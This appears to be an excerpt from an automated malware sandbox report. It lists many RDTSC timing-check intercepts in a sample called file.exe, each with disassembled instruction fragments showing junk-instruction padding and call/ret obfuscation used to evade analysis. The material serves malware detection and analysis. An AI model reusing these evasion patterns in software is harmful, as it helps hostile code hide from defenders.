                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB68A second address: 13CB694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB7F7 second address: 13CB7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8D5 second address: 13CB8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8D9 second address: 13CB8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8DF second address: 13CB8E9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65A450259Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC9EC second address: 13CC9F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE653 second address: 13CE657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE7F6 second address: 13CE8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F65A4C18F98h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D18FEh], ebx 0x0000002c mov dword ptr [ebp+122D3803h], edi 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push ebx 0x0000003a mov bl, cl 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F65A4C18F98h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov eax, dword ptr [ebp+122D0011h] 0x00000064 stc 0x00000065 push FFFFFFFFh 0x00000067 jmp 00007F65A4C18FA8h 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f pushad 0x00000070 popad 0x00000071 jng 00007F65A4C18F96h 0x00000077 popad 0x00000078 push eax 0x00000079 push edx 0x0000007a js 00007F65A4C18F96h 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF7F4 second address: 13CF7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D061D second address: 13D062F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF7FC second address: 13CF802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D062F second address: 13D0634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF802 second address: 13CF80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF8B3 second address: 13CF8D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F65A4C18F98h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1586 second address: 13D158A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D158A second address: 13D1590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1590 second address: 13D15B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F65A4502598h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D15B8 second address: 13D1639 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F65A4C18F98h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 add dword ptr [ebp+122DBA9Fh], ecx 0x00000029 jmp 00007F65A4C18F9Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F65A4C18F98h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122D19FCh], ecx 0x00000052 xchg eax, esi 0x00000053 jmp 00007F65A4C18FA7h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1639 second address: 13D163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D34C5 second address: 13D34D7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D34D7 second address: 13D34DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D34DB second address: 13D34DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D34DF second address: 13D34E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D34E5 second address: 13D34EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4543 second address: 13D454D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08C8 second address: 13D08CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D26DB second address: 13D26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D37C4 second address: 13D37C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D37C9 second address: 13D37D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D37D6 second address: 13D37DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D765C second address: 13D7676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A45025A6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6785 second address: 13D678A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D678A second address: 13D681B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F65A4502598h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 or di, CC91h 0x00000029 mov dword ptr [ebp+1245602Dh], eax 0x0000002f push dword ptr fs:[00000000h] 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F65A4502598h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 291FF293h 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e mov ebx, dword ptr [ebp+122D1905h] 0x00000064 mov eax, dword ptr [ebp+122D03B5h] 0x0000006a mov edi, 2C120181h 0x0000006f push FFFFFFFFh 0x00000071 mov ebx, dword ptr [ebp+122D358Ah] 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D681B second address: 13D6821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6821 second address: 13D6826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7997 second address: 13D799B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D799B second address: 13D79AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F65A4502596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D79AA second address: 13D79BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65A4C18F9Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1347 second address: 13E134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5700 second address: 13E5705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5705 second address: 13E574E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A9h 0x00000007 jmp 00007F65A45025A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65A45025A7h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E574E second address: 13E5752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5752 second address: 13E575A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F82 second address: 13E5F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F88 second address: 13E5F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F98 second address: 13E5F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5F9E second address: 13E5FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5FA3 second address: 13E5FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5FA9 second address: 13E5FBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F65A4502596h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5FBE second address: 13E5FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5FD5 second address: 13E5FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5FDA second address: 13E5FEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6093 second address: 13E60A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E60A4 second address: 13E60AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECD8E second address: 13ECD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC345 second address: 13EC36E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F65A4C18F96h 0x0000000d jmp 00007F65A4C18FA8h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC36E second address: 13EC385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65A450259Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC385 second address: 13EC389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC389 second address: 13EC38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC38F second address: 13EC397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC397 second address: 13EC39D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECBD1 second address: 13ECBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65A4C18F96h 0x0000000a jc 00007F65A4C18F96h 0x00000010 jmp 00007F65A4C18F9Fh 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECBF9 second address: 13ECC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A45025A5h 0x0000000e jmp 00007F65A45025A3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECC2A second address: 13ECC49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA5h 0x00000007 jg 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ECC49 second address: 13ECC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137FFEB second address: 137FFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137FFF1 second address: 137FFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F125B second address: 13F125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F13A5 second address: 13F13BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65A450259Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F13BD second address: 13F13C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6750 second address: 13A6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F65A450259Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F239D second address: 13F23A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0C30 second address: 13F0C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8B63 second address: 13F8B79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F9Ch 0x00000008 jg 00007F65A4C18F96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B6C second address: 1381B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A450259Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F794A second address: 13F7950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7950 second address: 13F7983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F65A45025A0h 0x0000000b jmp 00007F65A45025A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7983 second address: 13F7989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7989 second address: 13F798D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7AEE second address: 13F7AFC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F7AFC second address: 13F7B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84E4 second address: 13F84F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65A4C18F96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84F0 second address: 13F8502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65A450259Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB6E4 second address: 13FB6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB6EA second address: 13FB6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB6EE second address: 13FB716 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F65A4C18F9Dh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F65A4C18F9Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB716 second address: 13FB732 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F65A4502596h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65A45025A0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB732 second address: 13FB738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BED72 second address: 13BED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEFDC second address: 13BEFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEFE2 second address: 13BEFE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF227 second address: 13BF22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
